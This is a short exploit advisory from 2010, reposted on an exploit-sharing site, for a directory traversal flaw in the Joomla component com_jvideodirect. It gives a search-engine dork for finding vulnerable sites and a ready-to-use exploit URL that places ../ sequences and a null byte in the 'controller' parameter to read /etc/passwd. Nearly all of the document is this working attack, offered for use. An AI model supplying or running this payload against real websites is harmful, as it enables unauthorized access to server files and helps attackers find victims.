id: 10652
date: 01/10/2010
title: Joomla Component com_jvideodirect Directory Traversal
author: Fl0riX
cves: 

=====================================================
Joomla Component com_jvideodirect Directory Traversal
=====================================================


@~~=======================================~~@
@~~=Script : Joomla Component com_jvideodirect
 
@~~=Author : FL0RiX
 
@~~=Greez : Deep-Power ,Pyske,Wretch-x & All Friends
 
@~~=Bug Type : Directory Traversal
 
@~~=Dork : inurl:"com_jvideodirect "
 
@~~=Note : Kimseye Hakettiginden Fazla Deger Vermeyecekmissin..!!
 
@~~=======================================~~@
 
@~~=Vuln.
 
: http://site/ [Yol] /index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-25]  #